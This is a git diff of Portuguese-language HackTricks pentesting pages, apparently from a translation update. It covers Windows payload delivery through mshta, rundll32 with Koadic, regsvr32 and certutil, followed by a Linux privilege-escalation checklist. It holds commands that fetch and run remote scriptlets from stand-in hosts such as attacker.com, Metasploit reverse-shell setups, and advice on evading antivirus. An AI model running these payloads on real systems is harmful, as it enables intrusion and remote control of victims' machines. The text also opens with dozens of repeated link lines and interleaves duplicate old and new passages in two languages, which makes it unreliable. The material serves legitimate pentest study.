- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
@ -330,12 +486,12 @@ Para usar essa técnica, primeiro é necessário criar um arquivo `.sct` contend
Aqui está um exemplo de como usar o `mshta` com um arquivo `.sct`:
```
mshta.exe javascript:a=new%20ActiveXObject("WScript.Shell");a.run("cmd.exe%20/c%20calc.exe");window.close();
mshta http://attacker.com/malicious.sct
```
Neste exemplo, o código malicioso executa o comando `cmd.exe /c calc.exe`, que abre a calculadora do Windows.
Nesse exemplo, o `mshta` é usado para abrir o arquivo `.sct` hospedado em `http://attacker.com/malicious.sct`. O código malicioso contido no arquivo `.sct` será executado no alvo.
É importante observar que essa técnica pode ser detectada por soluções de segurança, portanto, é recomendável usá-la com cautela e apenas em ambientes controlados.
Essa técnica pode ser usada para realizar várias atividades maliciosas, como execução remota de código, download e execução de arquivos maliciosos, entre outros. É importante ressaltar que essa técnica pode ser detectada por soluções de segurança, portanto, é necessário tomar medidas adicionais para evitar a detecção.
```markup
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -353,13 +509,20 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
```
#### **Mshta - Metasploit**
O comando `mshta` é uma ferramenta do Windows que permite executar arquivos HTML como aplicativos. No contexto de um ataque cibernético, o `mshta` pode ser usado para executar payloads maliciosos em um sistema alvo.
Mshta is a Microsoft HTML Application Host that allows you to execute HTML applications (.hta files) on Windows systems. It is a legitimate Windows component that can be abused by attackers to execute malicious code.
O Metasploit Framework, uma popular plataforma de testes de penetração, possui um módulo chamado `exploit/windows/browser/mshta` que permite explorar vulnerabilidades no `mshta` para obter acesso não autorizado a um sistema.
Metasploit, a popular penetration testing framework, provides a module called `exploit/windows/browser/mshta` that exploits the Mshta vulnerability. This module generates a malicious .hta file and delivers it to the target system. When the file is executed, it runs the specified payload, giving the attacker remote access to the system.
Para usar o módulo `exploit/windows/browser/mshta` no Metasploit, você precisa configurar as opções necessárias, como o endereço IP do alvo e o caminho para o payload malicioso. Depois de configurar as opções, você pode executar o exploit e, se bem-sucedido, obter acesso ao sistema alvo.
To use the `exploit/windows/browser/mshta` module, follow these steps:
É importante ressaltar que o uso de ferramentas como o `mshta` para fins maliciosos é ilegal e antiético. Este conhecimento deve ser usado apenas para fins educacionais e de segurança, com o consentimento explícito do proprietário do sistema alvo.
1. Set the `RHOST` option to the IP address of the target system.
2. Set the `PAYLOAD` option to the desired payload.
3. Set the `LHOST` option to the IP address of the attacking machine.
4. Run the exploit.
Once the exploit is successful, the attacker will have a Meterpreter session, which provides a powerful interface to interact with the compromised system.
It is important to note that using Metasploit for unauthorized access to systems is illegal and unethical. This information is provided for educational purposes only.
```bash
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
@ -433,7 +596,7 @@ rundll32 payload.dll, <nome da função>
Certifique-se de substituir `<nome da função>` pelo nome da função exportada pela DLL maliciosa.
O `rundll32` é uma ferramenta poderosa que pode ser usada para executar payloads maliciosos no Windows. No entanto, é importante lembrar que o uso indevido dessa ferramenta é ilegal e pode resultar em consequências legais graves.
O `rundll32` é uma ferramenta poderosa que pode ser usada para executar payloads maliciosos no Windows. No entanto, é importante lembrar que o uso indevido dessa ferramenta é ilegal e pode resultar em consequências legais graves. Portanto, sempre use essas técnicas apenas para fins educacionais e com permissão adequada.
```bash
use windows/smb/smb_delivery
run
@ -441,13 +604,25 @@ run
```
**Rundll32 - Koadic**
Rundll32 is a Windows utility that allows the execution of DLL files as functions. This can be leveraged by hackers to load malicious DLLs and execute their code. One popular tool that utilizes this technique is Koadic.
Rundll32 is a Windows utility that allows the execution of DLL files as functions. This can be leveraged by hackers to load malicious DLLs and execute their code. Koadic is a post-exploitation tool that utilizes the Rundll32 technique to establish a command and control channel on a compromised Windows machine.
Koadic is a post-exploitation RAT (Remote Access Trojan) that provides a command and control (C2) framework for Windows systems. It allows hackers to gain remote access to compromised machines and perform various malicious activities.
To use Rundll32 with Koadic, follow these steps:
To use Koadic, the attacker first needs to generate a malicious DLL payload using the Koadic framework. This payload is then loaded using the Rundll32 utility, which executes the DLL's entry point function. Once executed, the malicious code establishes a connection with the attacker's C2 server, enabling them to control the compromised system remotely.
1. Generate a payload using Koadic. This payload will be a DLL file containing the malicious code you want to execute on the target machine.
This technique can be used for various purposes, such as stealing sensitive information, executing commands, or even pivoting to other systems within the network. It is important for system administrators to be aware of this technique and take appropriate measures to prevent its exploitation.
2. Transfer the generated payload to the target machine. This can be done using various methods such as email, USB drives, or exploiting vulnerabilities in other software.
3. Open a command prompt on the target machine and run the following command to execute the payload using Rundll32:
```
rundll32.exe <path_to_payload.dll>,<entry_point_function>
```
Replace `<path_to_payload.dll>` with the path to the transferred payload DLL file, and `<entry_point_function>` with the name of the function within the DLL that you want to execute.
4. Once the payload is executed, Koadic will establish a command and control channel, allowing you to remotely control the compromised machine and perform various post-exploitation activities.
It is important to note that the Rundll32 technique can be detected by antivirus software, so it is crucial to use evasion techniques to bypass detection. Additionally, this technique requires initial access to the target machine, either through a vulnerability or social engineering.
```bash
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
@ -476,7 +651,7 @@ regsvr32 /u <caminho_para_dll>
### Uso malicioso
Os hackers podem explorar o `regsvr32` para executar código malicioso em um sistema comprometido. Eles podem criar uma DLL maliciosa e registrá-la usando o `regsvr32`. Quando a DLL é registrada, o código malicioso é executado automaticamente sempre que o sistema é reiniciado.
Os hackers podem explorar o `regsvr32` para executar código malicioso no sistema comprometido. Eles podem criar uma DLL maliciosa e registrá-la usando o comando `regsvr32`. Quando a DLL é registrada, o código malicioso é executado automaticamente sempre que o sistema é reiniciado.
### Detecção e prevenção
@ -522,6 +697,20 @@ O Metasploit Framework, uma das ferramentas mais populares para testes de penetr
Esse módulo permite que um invasor execute comandos arbitrários no contexto do usuário atual, o que pode levar à execução remota de código e controle total do sistema comprometido.
Para usar esse módulo, é necessário ter acesso ao Metasploit Framework e conhecimento sobre como configurar e executar um payload específico.
Aqui está um exemplo de como usar o módulo `regsvr32` do Metasploit:
```
use exploit/windows/local/regsvr32_applocker_bypass
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <seu endereço IP>
set LPORT <sua porta>
exploit
```
Certifique-se de substituir `<seu endereço IP>` pelo seu endereço IP real e `<sua porta>` pela porta desejada para a conexão reversa.
Após a execução bem-sucedida do exploit, você terá acesso ao prompt do Meterpreter, que permite executar comandos no sistema alvo e explorar ainda mais a rede comprometida.
```bash
use multi/script/web_delivery
set target 3
@ -546,15 +735,22 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando seus clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novas recompensas por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
## **Cscript/Wscript**
```bash
@ -782,24 +978,31 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) Console PS com alguns módulos
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novas recompensas por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de cibersegurança**? Deseja ver sua **empresa anunciada no HackTricks**? Ou deseja ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

192
linux-hardening/linux-privilege-escalation-checklist.md
View file

@ -1,32 +1,198 @@
# Checklist - Escalação de Privilégios no Linux
# Checklist - Escalada de Privilégios no Linux
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga** me no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
🐞 Leia tutoriais de bugs web3
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🔔 Receba notificações sobre novos programas de recompensas por bugs
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando seus clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
💬 Participe de discussões na comunidade
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
### **Melhor ferramenta para procurar vetores de escalonamento de privilégios locais no Linux:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
### [Informações do sistema](privilege-escalation/#system-information)
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
* [ ] Obtenha informações do **sistema operacional**
* [ ] Verifique o [**PATH**](privilege-escalation/#path), alguma pasta **gravável**?
{% embed url="https://hackenproof.com/register" %}
### **Melhor ferramenta para procurar vetores de escalada de privilégios locais no Linux:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
### [Informações do Sistema](privilege-escalation/#system-information)
* [ ] Obtenha informações do **SO**
* [ ] Verifique o [**PATH**](privilege-escalation/#path), alguma **pasta gravável**?
* [ ] Verifique as [**variáveis de ambiente**](privilege-escalation/#env-info), algum detalhe sensível?
* [ ] Procure por [**exploits do
* [ ] Procure por [**exploits do kernel**](privilege-escalation/#kernel-exploits) **usando scripts** (DirtyCow?)
* [ ] **Verifique** se a [**versão do sudo é vulnerável**](privilege-escalation/#sudo-version)
* [ ] [**Dmesg** verificação de assinatura falhou](privilege-escalation/#dmesg-signature-verification-failed)
* [ ] Mais enumeração do sistema ([data, estatísticas do sistema, informações da CPU, impressoras](privilege-escalation/#more-system-enumeration))
* [ ] [Enumerar mais defesas](privilege-escalation/#enumerate-possible-defenses)
### [Drives](privilege-escalation/#drives)
* [ ] Liste as unidades **montadas**
* [ ] Alguma unidade **desmontada**?
* [ ] Alguma credencial em fstab?
### [**Software Instalado**](privilege-escalation/#installed-software)
* [ ] Verifique se há [**software útil**](privilege-escalation/#useful-software) **instalado**
* [ ] Verifique se há [**software vulnerável**](privilege-escalation/#vulnerable-software-installed) **instalado**
### [Processos](privilege-escalation/#processes)
* [ ] Existe algum software desconhecido em execução?
* [ ] Existe algum software em execução com **privilégios maiores do que deveria**?
* [ ] Procure por **exploits de processos em execução** (especialmente a versão em execução).
* [ ] Você pode **modificar o binário** de algum processo em execução?
* [ ] **Monitore os processos** e verifique se algum processo interessante está sendo executado com frequência.
* [ ] Você pode **ler** alguma **memória de processo** interessante (onde senhas podem estar salvas)?
### [Tarefas Agendadas/Cron?](privilege-escalation/#scheduled-jobs)
* [ ] O [**PATH** ](privilege-escalation/#cron-path)está sendo modificado por algum cron e você pode **escrever** nele?
* [ ] Algum [**curinga** ](privilege-escalation/#cron-using-a-script-with-a-wildcard-wildcard-injection)em um cron job?
* [ ] Algum [**script modificável** ](privilege-escalation/#cron-script-overwriting-and-symlink)está sendo **executado** ou está dentro de uma **pasta modificável**?
* [ ] Você detectou que algum **script** pode estar sendo [**executado** com muita **frequência**](privilege-escalation/#frequent-cron-jobs)? (a cada 1, 2 ou 5 minutos)
### [Serviços](privilege-escalation/#services)
* [ ] Algum arquivo **.service gravável**?
* [ ] Algum **binário gravável** executado por um **serviço**?
* [ ] Alguma **pasta gravável no PATH do systemd**?
### [Timers](privilege-escalation/#timers)
* [ ] Algum **timer gravável**?
### [Sockets](privilege-escalation/#sockets)
* [ ] Algum arquivo **.socket gravável**?
* [ ] É possível **comunicar-se com algum socket**?
* [ ] **Sockets HTTP** com informações interessantes?
### [D-Bus](privilege-escalation/#d-bus)
* [ ] É possível **comunicar-se com algum D-Bus**?
### [Rede](privilege-escalation/#network)
* [ ] Enumere a rede para saber onde você está
* [ ] **Portas abertas** que você não conseguia acessar antes de obter um shell dentro da máquina?
* [ ] É possível **capturar tráfego** usando `tcpdump`?
### [Usuários](privilege-escalation/#users)
* [ ] Enumeração de usuários/grupos genéricos
* [ ] Você tem um **UID muito grande**? A máquina está **vulnerável**?
* [ ] É possível [**elevar privilégios graças a um grupo**](privilege-escalation/interesting-groups-linux-pe/) ao qual você pertence?
* [ ] Dados da **Área de Transferência**?
* [ ] Política de Senhas?
* [ ] Tente **usar** todas as **senhas conhecidas** que você descobriu anteriormente para fazer login **com cada** usuário possível. Tente fazer login também sem uma senha.
### [PATH Gravável](privilege-escalation/#writable-path-abuses)
* [ ] Se você tiver **privilégios de gravação em alguma pasta no PATH**, poderá elevar privilégios
### [Comandos SUDO e SUID](privilege-escalation/#sudo-and-suid)
* [ ] É possível executar **qualquer comando com sudo**? É possível usá-lo para LER, ESCREVER ou EXECUTAR qualquer coisa como root? ([**GTFOBins**](https://gtfobins.github.io))
* [ ] Existe algum **binário SUID explorável**? ([**GTFOBins**](https://gtfobins.github.io))
* [ ] Os comandos [**sudo** são **limitados** por **caminho**? É possível **burlar** as restrições](privilege-escalation/#sudo-execution-bypassing-paths)?
* [ ] [**Comando Sudo/SUID sem caminho indicado**](privilege-escalation/#sudo-command-suid-binary-without-command-path)?
* [ ] [**Binário SUID especificando caminho**](privilege-escalation/#suid-binary-with-command-path)? Bypass
* [ ] [**Vulnerabilidade LD\_PRELOAD**](privilege-escalation/#ld\_preload)
* [ ] [**Ausência de biblioteca .so em binário SUID**](privilege-escalation/#suid-binary-so-injection) de uma pasta gravável?
* [ ] [**Tokens SUDO disponíveis**](privilege-escalation/#reusing-sudo-tokens)? É possível [**criar um token SUDO**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)?
* [ ] É possível [**ler ou modificar arquivos sudoers**](privilege-escalation/#etc-sudoers-etc-sudoers-d)?
* [ ] É possível [**modificar /etc/ld.so.conf.d/**](privilege-escalation/#etc-ld-so-conf-d)?
* [ ] Comando [**OpenBSD DOAS**](privilege-escalation/#doas)
### [Capabilities](privilege-escalation/#capabilities)
* [ ] Algum binário possui alguma **capacidade inesperada**?
### [ACLs](privilege-escalation/#acls)
* [ ] Algum arquivo possui alguma **ACL inesperada**?
### [Sessões de Shell Abertas](privilege-escalation/#open-shell-sessions)
* [ ] **screen**
* [ ] **tmux**
### [SSH](privilege-escalation/#ssh)
* [ ] **Debian** [**OpenSSL PRNG Previsível - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)
* [ ] [**Valores de configuração SSH interessantes**](privilege-escalation/#ssh-interesting-configuration-values)
### [Arquivos Interessantes](privilege-escalation/#interesting-files)
* [ ] Arquivos **de perfil** - Ler dados sensíveis? Escrever para privilégios elevados?
* [ ] Arquivos **passwd/shadow** - Ler dados sensíveis? Escrever para privilégios elevados?
* [ ] Verifique **pastas comumente interessantes** em busca de dados sensíveis
* [ ] **Localização/Estrutura de arquivos estranha**, você pode ter acesso ou alterar arquivos executáveis
* [ ] **Modificado** nos últimos minutos
* [ ] Arquivos **DB Sqlite**
* [ ] Arquivos **ocultos**
* [ ] **Scripts/Binários no PATH**
* [ ] Arquivos **Web** (senhas?)
* [ ] **Backups**?
* [ ] **Arquivos conhecidos que contêm senhas**: Use **Linpeas** e **LaZagne**
* [ ] **Busca genérica**
### [Arquivos Graváveis](privilege-escalation/#writable-files)
* [ ] **Modificar biblioteca Python** para executar comandos arbitrários?
* [ ] É possível **modificar arquivos de log**? Exploração do **Logtotten**
* [ ] É possível **modificar /etc/sysconfig/network-scripts/**? Exploração do Centos/Redhat
* [ ] É possível [**escrever em arquivos ini, int.d, systemd ou rc.d**](privilege-escalation/#init-init-d-systemd-and-rc-d)?
### [Outros truques](privilege-escalation/#other-tricks)
* [ ] É possível [**abusar do NFS para elevar privilégios**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] É necessário [**escapar de um shell restritivo**](privilege-escalation/#escaping-from-restricted-shells)?
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento da recompensa. Você receberá a recompensa após a verificação do bug.
**Adquira experiência em pentesting web3**\
Protocolos blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
**Torne-se uma lenda hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) e comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
